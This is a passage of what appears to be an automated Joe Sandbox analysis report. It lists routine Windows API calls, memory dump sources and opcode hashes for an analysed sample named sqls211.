                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String
                                                                                                            • String ID: LCMapStringEx
                                                                                                            • API String ID: 2568140703-3893581201
                                                                                                            • Opcode ID: 8de5d07773053a2305d79c12e5e2c39d21fc3a6cf95317792b9ff8c805a43479
                                                                                                            • Instruction ID: b83b8dc36476b33bcd0162535b7b8f392401cfd5b762aa76264a2065a5854530
                                                                                                            • Opcode Fuzzy Hash: 8de5d07773053a2305d79c12e5e2c39d21fc3a6cf95317792b9ff8c805a43479
                                                                                                            • Instruction Fuzzy Hash: 4801483250424EBFCF02AF91DC06EEE7F62EF08750F014255FE1466160CA729A31EB82
                                                                                                            APIs
                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00CEA56F), ref: 00CEAF55
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountCriticalInitializeSectionSpin
                                                                                                            • String ID: InitializeCriticalSectionEx
                                                                                                            • API String ID: 2593887523-3084827643
                                                                                                            • Opcode ID: 72acc839015317f5e38bd6130651fc90a8a6118f00d5ff80f8fae616c0b6c49e
                                                                                                            • Instruction ID: fc4cbb317f9e729dde203cb9c92dda8b80ea303b88ff294820e25608ee909037
                                                                                                            • Opcode Fuzzy Hash: 72acc839015317f5e38bd6130651fc90a8a6118f00d5ff80f8fae616c0b6c49e
                                                                                                            • Instruction Fuzzy Hash: 5EF0903164525CBFCF056F51CC06EBD7F61EF04B11B004165F90996260DA715B20E787
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Alloc
                                                                                                            • String ID: FlsAlloc
                                                                                                            • API String ID: 2773662609-671089009
                                                                                                            • Opcode ID: bd7017dfd31223291c81c70e61e3e4db4655a915cbd8d1ec6ed9e7808309be9c
                                                                                                            • Instruction ID: 798005b770d6f0a61d9d0bf933d7c9e5a7d2a6c30a0f44cb9ffa47f3445649a8
                                                                                                            • Opcode Fuzzy Hash: bd7017dfd31223291c81c70e61e3e4db4655a915cbd8d1ec6ed9e7808309be9c
                                                                                                            • Instruction Fuzzy Hash: 4DE0E531A4521C7BC611AB66DC06F7EBB54DB04B21B0142AAF90597250CDB16F11D6DB
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDEAF9
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID: 3Qo
                                                                                                            • API String ID: 1269201914-1944013411
                                                                                                            • Opcode ID: ec383a67574565957502a22829121625532fa0e3c2c5ffeed75a1ca2d572f394
                                                                                                            • Instruction ID: 432328b0a4afe5b72a2772755b63c1a1aed0d0fe886c9adb9b85d1ea6d8a9eb9
                                                                                                            • Opcode Fuzzy Hash: ec383a67574565957502a22829121625532fa0e3c2c5ffeed75a1ca2d572f394
                                                                                                            • Instruction Fuzzy Hash: D1B0928639A0967C2108B2052E42C360118C090B95320802BB604C8281988008012432
                                                                                                            APIs
                                                                                                              • Part of subcall function 00CEB7BB: GetOEMCP.KERNEL32(00000000,?,?,00CEBA44,?), ref: 00CEB7E6
                                                                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00CEBA89,?,00000000), ref: 00CEBC64
                                                                                                            • GetCPInfo.KERNEL32(00000000,00CEBA89,?,?,?,00CEBA89,?,00000000), ref: 00CEBC77
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CodeInfoPageValid
                                                                                                            • String ID:
                                                                                                            • API String ID: 546120528-0
                                                                                                            • Opcode ID: a8dd6842db5ef299c455765ec475f2b1097a75a82ed5df3dc35de7e8b8b0ea69
                                                                                                            • Instruction ID: 71cd51073b1634bc6441341065e3b7e72daab67f9279062a53dc5ee5a4624e46
                                                                                                            • Opcode Fuzzy Hash: a8dd6842db5ef299c455765ec475f2b1097a75a82ed5df3dc35de7e8b8b0ea69
                                                                                                            • Instruction Fuzzy Hash: A7515470A047D59EDB208F77C8816BBBBE5EF41300F28446ED4A68B262D7359F46DB90
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00CC9A50,?,?,00000000,?,?,00CC8CBC,?), ref: 00CC9BAB
                                                                                                            • GetLastError.KERNEL32(?,00000000,00CC8411,-00009570,00000000,000007F3), ref: 00CC9BB6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2976181284-0
                                                                                                            • Opcode ID: 12d676219fb2046c684498e276ce6d79fd9d8185fbad3d1d0190f71ce8b517ba
                                                                                                            • Instruction ID: 69131f5ca6b02269df919dd46a9109f01b50819b166a60009209184bd9a576b0
                                                                                                            • Opcode Fuzzy Hash: 12d676219fb2046c684498e276ce6d79fd9d8185fbad3d1d0190f71ce8b517ba
                                                                                                            • Instruction Fuzzy Hash: 9F41DE71604341AFDB34DF15E5A8E6AB7E5FFD4320F158A2DE8A183260D770EE058A51
                                                                                                            APIs
                                                                                                              • Part of subcall function 00CE97E5: GetLastError.KERNEL32(?,00D01030,00CE4674,00D01030,?,?,00CE3F73,00000050,?,00D01030,00000200), ref: 00CE97E9
                                                                                                              • Part of subcall function 00CE97E5: _free.LIBCMT ref: 00CE981C
                                                                                                              • Part of subcall function 00CE97E5: SetLastError.KERNEL32(00000000,?,00D01030,00000200), ref: 00CE985D
                                                                                                              • Part of subcall function 00CE97E5: _abort.LIBCMT ref: 00CE9863
                                                                                                              • Part of subcall function 00CEBB4E: _abort.LIBCMT ref: 00CEBB80
                                                                                                              • Part of subcall function 00CEBB4E: _free.LIBCMT ref: 00CEBBB4
                                                                                                              • Part of subcall function 00CEB7BB: GetOEMCP.KERNEL32(00000000,?,?,00CEBA44,?), ref: 00CEB7E6
                                                                                                            • _free.LIBCMT ref: 00CEBA9F
                                                                                                            • _free.LIBCMT ref: 00CEBAD5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorLast_abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 2991157371-0
                                                                                                            • Opcode ID: 83f1ffe873991faecea118b4897d90a09e4ad48b9ebd9f3fe22655f25084005a
                                                                                                            • Instruction ID: 5a12a35f5d17fff7fa183d8c4747a45d32b951403726ea633d4499cc9f65f5aa
                                                                                                            • Opcode Fuzzy Hash: 83f1ffe873991faecea118b4897d90a09e4ad48b9ebd9f3fe22655f25084005a
                                                                                                            • Instruction Fuzzy Hash: B431AC31904189AFDF10DF6AE841BBEB7F5EF40324F2540A9E5149B2A1EB715E44FB50
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00CC1E55
                                                                                                              • Part of subcall function 00CC3BBA: __EH_prolog.LIBCMT ref: 00CC3BBF
                                                                                                            • _wcslen.LIBCMT ref: 00CC1EFD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog$_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2838827086-0
                                                                                                            • Opcode ID: b8bd1ef192f65b27c665038ecf16e0cd796517442dd43ab327889e9434d8c155
                                                                                                            • Instruction ID: 4bb41acaba3304de715f7f26ee629f88f492358e10789995a741638a42564687
                                                                                                            • Opcode Fuzzy Hash: b8bd1ef192f65b27c665038ecf16e0cd796517442dd43ab327889e9434d8c155
                                                                                                            • Instruction Fuzzy Hash: 4D314B71904249AFCF15EF9AC945EEEBBF6AF49300F1400AEF845A7252CB325E41DB60
                                                                                                            APIs
                                                                                                            • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CC73BC,?,?,?,00000000), ref: 00CC9DBC
                                                                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00CC9E70
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$BuffersFlushTime
                                                                                                            • String ID:
                                                                                                            • API String ID: 1392018926-0
                                                                                                            • Opcode ID: 9165b9b2bf9439e9ef5514f1f2df98d82bfb099046475bc9bdc00577840a9ad0
                                                                                                            • Instruction ID: e02f98ade095a0571b626c3091a79e40a4c4dfa9c7643e11cbed70e07640cad1
                                                                                                            • Opcode Fuzzy Hash: 9165b9b2bf9439e9ef5514f1f2df98d82bfb099046475bc9bdc00577840a9ad0
                                                                                                            • Instruction Fuzzy Hash: 1221CE31248285ABC714DF24C899FAABBE4EF55304F08491DF8E687151D339EA0DDB62
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00CC9F27,?,?,00CC771A), ref: 00CC96E6
                                                                                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00CC9F27,?,?,00CC771A), ref: 00CC9716
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 9a59275a13d86289cda513c65476211c90e613133e9fc23afb99dd4a6d69c702
                                                                                                            • Instruction ID: 8df1a19b186a8d0106ef92e29b54e20eb7bf4ec7ea910ae76e8c5b71eadffa96
                                                                                                            • Opcode Fuzzy Hash: 9a59275a13d86289cda513c65476211c90e613133e9fc23afb99dd4a6d69c702
                                                                                                            • Instruction Fuzzy Hash: 4F21BDB15003446FE3708A65CC89FB7B7DCEB49324F100A1DFAA5C62D1C774A9849631
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00CC9EC7
                                                                                                            • GetLastError.KERNEL32 ref: 00CC9ED4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2976181284-0
                                                                                                            • Opcode ID: b7e36cf2b1515091ae52c04cc8de69b35601738a73303ecba7d25c4c459330bd
                                                                                                            • Instruction ID: 2b3f81c6511420551fe6cfc9a0473ccbf0e1641021b997f2e09289bfabcdde78
                                                                                                            • Opcode Fuzzy Hash: b7e36cf2b1515091ae52c04cc8de69b35601738a73303ecba7d25c4c459330bd
                                                                                                            • Instruction Fuzzy Hash: 6811A571600700ABD724C669C849FA6B7E9EB55360F504A2DE563D26D0D7B0EE45C760
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00CE8E75
                                                                                                              • Part of subcall function 00CE8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CECA2C,00000000,?,00CE6CBE,?,00000008,?,00CE91E0,?,?,?), ref: 00CE8E38
                                                                                                            • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00D01098,00CC17CE,?,?,00000007,?,?,?,00CC13D6,?,00000000), ref: 00CE8EB1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocAllocate_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2447670028-0
                                                                                                            • Opcode ID: 1088c954986a49e441a1fa3f745f5cdf7cbcb22a25c41d2052a7ae36b18a14a3
                                                                                                            • Instruction ID: b6f82b6f933a8d4937c7ca7e1e9cfa0b6afc874cfeeb31376959461a5052db0e
                                                                                                            • Opcode Fuzzy Hash: 1088c954986a49e441a1fa3f745f5cdf7cbcb22a25c41d2052a7ae36b18a14a3
                                                                                                            • Instruction Fuzzy Hash: 32F0F63A2012C27ADB212A279C05F6F37588F82B70F680125F82CA7191DF74CE08A1A0
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 00CD10AB
                                                                                                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 00CD10B2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$AffinityCurrentMask
                                                                                                            • String ID:
                                                                                                            • API String ID: 1231390398-0
                                                                                                            • Opcode ID: 44b8a650405cb64cf29652ba87347db5823d58941724e72f0d17a1e8b81a0583
                                                                                                            • Instruction ID: 838c8e4d8be9534f84defd4e27eac4ad653253b08083e454225c31d6ec892772
                                                                                                            • Opcode Fuzzy Hash: 44b8a650405cb64cf29652ba87347db5823d58941724e72f0d17a1e8b81a0583
                                                                                                            • Instruction Fuzzy Hash: 03E09272B10185B78F0997A49C05ABF72DEEA442443184177EA13D3201F934EF418760
                                                                                                            APIs
                                                                                                            • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA501
                                                                                                              • Part of subcall function 00CCBB03: _wcslen.LIBCMT ref: 00CCBB27
                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA532
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile$_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2673547680-0
                                                                                                            • Opcode ID: b9606aa19b3353566a66d835d741e24236723531a0d62e6f85d4ce513b479649
                                                                                                            • Instruction ID: 492569a820869221fd1788fa113b580d7e3274d5557f1df9cf91546c9ab7abc0
                                                                                                            • Opcode Fuzzy Hash: b9606aa19b3353566a66d835d741e24236723531a0d62e6f85d4ce513b479649
                                                                                                            • Instruction Fuzzy Hash: 84F0393624024DBBDF016F60DC45FEE3B6CAF04389F488066B949D6160DB71DE99EA61
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNELBASE(000000FF,?,?,00CC977F,?,?,00CC95CF,?,?,?,?,?,00CF2641,000000FF), ref: 00CCA1F1
                                                                                                              • Part of subcall function 00CCBB03: _wcslen.LIBCMT ref: 00CCBB27
                                                                                                            • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CC977F,?,?,00CC95CF,?,?,?,?,?,00CF2641), ref: 00CCA21F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DeleteFile$_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2643169976-0
                                                                                                            • Opcode ID: ca82dabb5c49bcb10570121dbfd1e379bca3d86e74735b0629c58b7746d09e27
                                                                                                            • Instruction ID: cc83a65da11962d74a05e6f85a0778ccff7846d78407c5d839993e6fce246c71
                                                                                                            • Opcode Fuzzy Hash: ca82dabb5c49bcb10570121dbfd1e379bca3d86e74735b0629c58b7746d09e27
                                                                                                            • Instruction Fuzzy Hash: D8E0923114021D7BDB015F60DC45FEE375CAF08385F484026B948D6050EB61DE84EA55
                                                                                                            APIs
                                                                                                            • GdiplusShutdown.GDIPLUS(?,?,?,?,00CF2641,000000FF), ref: 00CDACB0
                                                                                                            • CoUninitialize.COMBASE(?,?,?,?,00CF2641,000000FF), ref: 00CDACB5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
